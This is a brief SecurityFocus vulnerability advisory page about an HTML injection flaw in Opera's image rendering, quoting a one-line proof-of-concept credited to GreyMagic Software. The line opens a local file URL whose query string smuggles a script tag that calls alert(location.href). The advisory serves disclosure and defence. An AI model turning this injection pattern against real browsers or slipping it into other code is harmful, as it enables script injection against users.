info
discussion
exploit
solution
references
Opera Image Rendering HTML Injection Vulnerability
The following proof of concept exploit was provided by GreyMagic Software:
open("file://localhost/images/file.gif?\"><script>alert(location.href);</script>","","");
Privacy Statement
Copyright 2010, SecurityFocus
